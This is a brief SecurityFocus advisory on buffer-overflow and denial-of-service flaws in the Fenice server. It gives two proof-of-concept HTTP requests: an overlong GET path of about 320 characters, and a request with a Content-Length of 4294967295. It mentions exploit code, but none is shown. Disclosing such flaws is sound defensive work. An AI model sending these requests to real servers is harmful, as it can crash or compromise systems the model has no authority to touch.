Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities

The following HTTP request is sufficient to demonstrate the buffer-overflow vulnerability:
GET /[approximately 320 'a's] HTTP/1.0

The following HTTP request is sufficient to demonstrate the denial-of-service vulnerabilty:
GET / HTTP/1.0
Content-Length: 4294967295

The following exploit code is available:


 

Privacy Statement
Copyright 2010, SecurityFocus